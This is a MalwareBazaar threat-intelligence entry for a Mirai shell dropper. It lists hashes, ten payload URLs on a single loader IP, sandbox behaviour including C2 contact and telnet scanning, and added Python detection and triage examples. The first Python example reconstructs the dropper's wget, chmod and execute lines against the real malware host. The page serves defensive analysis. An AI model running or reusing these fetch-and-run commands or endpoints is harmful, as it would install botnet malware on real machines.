MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 af8c3a9558e5e0b3ec35d231bcff2007b5f8f07942828bbbab235724876e3d5d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Mirai
Vendor detections: 7



SHA256 hash: af8c3a9558e5e0b3ec35d231bcff2007b5f8f07942828bbbab235724876e3d5d
SHA3-384 hash: 3b865b610d9e7683582991ea6eebca4db7d1d2a4f759528e984ca1ffc0c1b9d6f31a3823e1796bbd8318c71947c93409
SHA1 hash: 8cc6ae1780bdba45c03b7df9de0c6d1244d6174d
MD5 hash: 719109fbc1d21675356cd7c06614ce1f
humanhash: illinois-hot-don-king
File name: li
Signature: Mirai
File size: 657 bytes
First seen: 2025-06-26 05:21:32 UTC
Last seen: 2025-06-26 10:36:04 UTC
File type: sh
MIME type: text/plain
ssdeep: 12:4URUKJUSNIl5PUf0LKOUSBU9U014U4tVR9UQBXU4BU:4URUKJUSNI7PUqKOUSBU9U0qU4tJUAU5
TLSH: T14F012CAE287174E64A399E56B0738754702C96CDFA748F08A54F58BF8DD7B00341CF45
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
IOCs (payload URLs fetched by this script; one build per CPU architecture, all on the same host)

URL | Malware sample (SHA256 hash) | Signature | Tags
http://185.208.158.140/arm | 8271f1f986b352fff15ea4a77cc5fec53c1d9dcca742d4a9c9d2ab6891eab18a | Mirai | elf gafgyt mirai ua-wget
http://185.208.158.140/arm5 | 575ef1a01819dd1f1c2c0fb09b0001725599230fc4ce03d197b52751ff85a341 | Mirai | elf mirai ua-wget
http://185.208.158.140/arm6 | 6402c8ac9e7bcc47f493ed249ef2b5a0e1b0b317e0dbd8012b61d3507c67fd0e | Mirai | elf mirai ua-wget
http://185.208.158.140/arm7 | 37d405a2afcd051f24faa7d536ac292e28148575a2ee02766b92046f413a3c57 | Mirai | elf mirai ua-wget
http://185.208.158.140/mips | 7b02048872ec82be36a7a9c28d8479a1c884a2df339416c822554211e6d5b05e | Mirai | elf gafgyt mirai ua-wget
http://185.208.158.140/mipsel | f0c4dc9e697cc34437766c67140cc210be04bd62997bf2ace3c389e3d9e32ff7 | Mirai | elf mirai ua-wget
http://185.208.158.140/powerpc | cefd6e28cd1c138a151a1721dbbe1a53b410424b259179faa792fcc8063952ba | Mirai | elf mirai ua-wget
http://185.208.158.140/sh4 | dfc72b2b40890a9747c242f69db7c4941794bf89c5ff0ef75dab6e1338c6cd6f | Mirai | elf mirai ua-wget
http://185.208.158.140/sparc | 36eb14fd17bd36eb37ce29bdffe3109b88ffef2387f94647593d267b3214b134 | Mirai | elf mirai ua-wget
http://185.208.158.140/x86_64 | 1d9f46542a855257b2a801c72449db0482435d1bb05cffccc0ad56a82e4631e6 | Mirai | elf mirai ua-wget
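The ten URLs above are the classic Mirai loader layout: one host serving one ELF build per CPU family, and a shell script that fetches, chmods and runs each in turn until one matches the victim's architecture. The Python below is an added example, not MalwareBazaar's code and not the malware itself: it triages a constructed stand-in for the 657-byte dropper, pulling out the download host, the payload names with a guessed CPU family, and the number of wget/chmod/execute chains. The stand-in's exact command layout, the ARCH_HINTS mapping and all helper names are assumptions; only the host and payload names come from the table.

```python
"""Static triage of a Mirai-style dropper script.

Added example for this page; it is neither MalwareBazaar's code nor the
malware. SAMPLE_DROPPER is a constructed stand-in for the 657-byte 'li'
script: the host and payload names come from the IOC table on this page,
while the command layout (one rm, then wget / chmod / execute per
architecture) is an assumption drawn from the sandbox process chain.
"""
import re
from collections import Counter
from urllib.parse import urlparse

PAYLOADS = ["arm", "arm5", "arm6", "arm7", "mips", "mipsel",
            "powerpc", "sh4", "sparc", "x86_64"]

# Constructed input, not the real file.
SAMPLE_DROPPER = "rm -rf " + " ".join(PAYLOADS) + "\n" + "".join(
    f"wget http://185.208.158.140/{p}; chmod +x {p}; ./{p}\n" for p in PAYLOADS
)

URL_RE = re.compile(r"https?://[^\s;|&\"'<>]+")

# wget <url ending in NAME>; chmod +x NAME; ./NAME  -- the classic loader line.
CHAIN_RE = re.compile(
    r"(?:wget|curl)\b[^\n;]*?/([\w.-]+)\s*;\s*chmod\s+(?:\+x|[0-7]{3,4})\s+\1\s*;\s*\./\1\b"
)

# Payload-name fragments Mirai forks use for their build targets (assumed mapping).
ARCH_HINTS = {
    "arm": "ARM", "arm5": "ARMv5", "arm6": "ARMv6", "arm7": "ARMv7",
    "mips": "MIPS (big-endian)", "mipsel": "MIPS (little-endian)",
    "powerpc": "PowerPC", "ppc": "PowerPC", "sh4": "SuperH SH-4",
    "sparc": "SPARC", "x86_64": "x86-64", "x86": "x86", "i586": "x86",
    "i686": "x86", "m68k": "m68k",
}


def guess_arch(name: str) -> str:
    """Longest ARCH_HINTS key contained in the payload name wins."""
    lname = name.lower()
    best = max((h for h in ARCH_HINTS if h in lname), key=len, default="")
    return ARCH_HINTS.get(best, "unknown")


def extract_iocs(script: str) -> dict:
    """Hosts, per-architecture payloads and loader-pattern counts for a script."""
    urls = sorted(set(URL_RE.findall(script)))
    payloads = []
    for u in urls:
        name = urlparse(u).path.rsplit("/", 1)[-1]
        payloads.append({"url": u, "name": name, "arch": guess_arch(name)})
    return {
        "hosts": dict(Counter(urlparse(u).netloc for u in urls)),
        "payloads": payloads,
        "download_exec_chains": len(CHAIN_RE.findall(script)),
        "self_cleanup": re.search(r"\brm\s+-rf?\b", script) is not None,
    }


def hunting_terms(iocs: dict) -> list:
    """Strings worth searching proxy and sandbox logs for: hosts and URL paths."""
    terms = set(iocs["hosts"])
    terms.update(urlparse(p["url"]).path for p in iocs["payloads"])
    return sorted(terms)


if __name__ == "__main__":
    result = extract_iocs(SAMPLE_DROPPER)
    for p in result["payloads"]:
        print(f"{p['name']:<8} {p['arch']:<22} {p['url']}")
    print("hosts:", result["hosts"])
    print("wget/chmod/exec chains:", result["download_exec_chains"],
          "| cleanup:", result["self_cleanup"])
    print("hunt for:", hunting_terms(result))
```

CHAIN_RE only recognises the form where the saved file keeps the URL's basename; loaders that rename with `wget -O` or `curl -o` need a second pattern that captures the output name instead. The hunting terms are deliberately host plus path, not full URL, because the same loader host is typically reused with a different scheme or port.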

Intelligence


File Origin
# of uploads: 2
# of downloads: 81
Origin country: DE

Vendor Threat Intelligence
Verdict: Malicious
Score: 81.4%
Tags: mirai virus shell
Status: terminated
Behavior Graph:
(summary of the sandbox process graph)
/usr/bin/sudo (pid 5215) execve /tmp/sample.bin (pid 5216)
  pid 5216 execve /usr/bin/rm (pid 5217)
  pid 5216 then repeats, once per payload, the chain: execve /usr/bin/wget (net, send-data, write-file) -> execve /usr/bin/chmod -> clone /usr/bin/dash
    wget pids 5218, 5230, 5234, 5238, 5241, 5245, 5249, 5252, 5256, 5259 each send 133-137 B to 185.208.158.140:80 (the HTTP request); pids 5238, 5249 and 5256 are recorded without write-file
    chmod pids 5227, 5231, 5235, 5239, 5242, 5246, 5250, 5253, 5257, 5260; dash clones 5228, 5232, 5236, 5240, 5243, 5247, 5251, 5254, 5258
  pid 5216 execve /home/sandbox/x86_64 (pid 5261, net): connects to 8.8.8.8:53
    pid 5261 clone /home/sandbox/x86_64 (pid 5262; dns, net, send-data, zombie): sends 29 B to 8.8.8.8:53, sends 12 B to bot.vac.lol:38241
    pid 5262 clone /home/sandbox/x86_64 (pid 5263)
    pid 5262 clone /home/sandbox/x86_64 (pid 5264; net, net-scan, send-data): connects to 8.8.8.8:53, send-data to 4097 IP addresses (review logs to see them all)
    pid 5262 clone /home/sandbox/x86_64 (pid 5265; net, net-scan, send-data): connects to 8.8.8.8:53, sends 40 B to 49.48.197.248:23, send-data to 4097 IP addresses (review logs to see them all)
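The graph has the two phases a responder wants to detect: the loader loop (wget, chmod, exec for every payload, all against 185.208.158.140:80), and, once the native x86_64 build actually runs, a DNS lookup, a 12-byte hello to bot.vac.lol:38241 and telnet-port scanning of thousands of addresses. The Python below is an added example, not the sandbox vendor's or MalwareBazaar's code: it replays a constructed, simplified event list modelled on that graph (the written file paths and the pid spacing are assumptions; images and remote endpoints are taken from the graph) and applies three detection rules to it.

```python
"""Behavioural triage over sandbox process/network events.

Added example for this page, not MalwareBazaar's or the sandbox vendor's
code. build_sample_events() is a constructed, simplified replay of the
behaviour graph above: images and remote endpoints come from the graph,
the written file paths and pid spacing are assumed.
"""
from collections import defaultdict
from typing import NamedTuple


class Event(NamedTuple):
    pid: int
    ppid: int
    image: str
    kind: str          # exec | clone | connect | write | scan
    detail: str = ""   # remote host:port, written path, or scan summary


PAYLOADS = ["arm", "arm5", "arm6", "arm7", "mips", "mipsel",
            "powerpc", "sh4", "sparc", "x86_64"]
LOADER_HOST = "185.208.158.140:80"
BENIGN_PORTS = {53, 80, 443}


def build_sample_events() -> list:
    """Constructed event stream (not real sandbox output)."""
    ev = [Event(5215, 1, "/usr/bin/sudo", "exec"),
          Event(5216, 5215, "/tmp/sample.bin", "exec"),
          Event(5217, 5216, "/usr/bin/rm", "exec")]
    pid = 5218
    for name in PAYLOADS:
        path = f"/home/sandbox/{name}"   # assumed: graph only says 'write-file'
        ev += [Event(pid, 5216, "/usr/bin/wget", "exec"),
               Event(pid, 5216, "/usr/bin/wget", "connect", LOADER_HOST),
               Event(pid, 5216, "/usr/bin/wget", "write", path),
               Event(pid + 1, 5216, "/usr/bin/chmod", "exec", path)]
        if name != "x86_64":
            # foreign-architecture builds fail to exec; only the dash fork shows
            ev.append(Event(pid + 2, 5216, "/usr/bin/dash", "clone"))
        pid += 3
    bot = "/home/sandbox/x86_64"
    ev += [Event(5261, 5216, bot, "exec"),
           Event(5262, 5261, bot, "clone"),
           Event(5262, 5261, bot, "connect", "8.8.8.8:53"),
           Event(5262, 5261, bot, "connect", "bot.vac.lol:38241"),
           Event(5264, 5262, bot, "clone"),
           Event(5264, 5262, bot, "scan", "4097 addresses"),
           Event(5265, 5262, bot, "clone"),
           Event(5265, 5262, bot, "connect", "49.48.197.248:23"),
           Event(5265, 5262, bot, "scan", "4097 addresses")]
    return ev


def port_of(endpoint: str) -> int:
    return int(endpoint.rsplit(":", 1)[1])


def descendants(roots: set, events: list) -> set:
    """All pids in the subtrees rooted at `roots` (roots included)."""
    children = defaultdict(set)
    for e in events:
        children[e.ppid].add(e.pid)
    seen, stack = set(roots), list(roots)
    while stack:
        for c in children[stack.pop()]:
            if c not in seen:
                seen.add(c)
                stack.append(c)
    return seen


def detect(events: list) -> list:
    findings = []
    by_parent = defaultdict(list)
    for e in events:
        by_parent[e.ppid].append(e)
    # Rule 1: one parent repeatedly running wget against a single host, plus chmod.
    for ppid, kids in by_parent.items():
        hosts = {e.detail.rsplit(":", 1)[0] for e in kids
                 if e.image.endswith("/wget") and e.kind == "connect"}
        fetches = sum(1 for e in kids if e.image.endswith("/wget") and e.kind == "exec")
        chmods = sum(1 for e in kids if e.image.endswith("/chmod") and e.kind == "exec")
        if fetches >= 3 and chmods >= 3 and len(hosts) == 1:
            findings.append(f"loader loop: pid {ppid} fetched {fetches} files "
                            f"from {hosts.pop()} and chmod'ed {chmods}")
    # Rule 2: a file written by the loader is later executed.
    written = {e.detail for e in events if e.kind == "write"}
    dropped = [e for e in events if e.kind == "exec" and e.image in written]
    for path in sorted({e.image for e in dropped}):
        findings.append(f"dropped payload executed: {path}")
    # Rule 3: inside the payload's subtree: unusual-port C2, telnet probes, mass scanning.
    tree = descendants({e.pid for e in dropped}, events)
    for e in events:
        if e.pid not in tree or e.kind != "connect":
            continue
        p = port_of(e.detail)
        if p == 23:
            findings.append(f"telnet probe from pid {e.pid} to {e.detail}")
        elif p not in BENIGN_PORTS:
            findings.append(f"C2 candidate: pid {e.pid} -> {e.detail}")
    scanners = sorted({e.pid for e in events if e.pid in tree and e.kind == "scan"})
    if scanners:
        findings.append(f"mass scanning by pids {scanners}")
    return findings


if __name__ == "__main__":
    for line in detect(build_sample_events()):
        print(line)
```

Rule 3 is scoped to the subtree of the executed dropped file on purpose: a generic "connects to port 38241" rule would fire on plenty of legitimate software, but a process that was written to disk by wget seconds earlier, executed, and then both talks to an unusual port and probes port 23 on other hosts is the Mirai pattern and little else.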
Threat name: Script-Shell.Worm.Mirai
Status: Malicious
First seen: 2025-06-26 01:39:15 UTC
File Type: Text (Shell)
AV detection: 17 of 38 (44.74%)
Threat level: 5/5
Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
(These three behaviours are Windows API indicators and cannot come from a POSIX shell script; treat this vendor result as a generic run that did not exercise the sample.)
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery: Web download
Signature: Mirai
sh af8c3a9558e5e0b3ec35d231bcff2007b5f8f07942828bbbab235724876e3d5d (this sample)
  drops 19da04015acaedbae56e0a3ffa9e7f848c0a287d6307e23c898c7a5ff4b9af84

Delivery method: Distributed via web download
Dropping: MD5 357b1387f396bfcc83dde25158b6ce8b
Dropping: SHA256 19da04015acaedbae56e0a3ffa9e7f848c0a287d6307e23c898c7a5ff4b9af84

Comments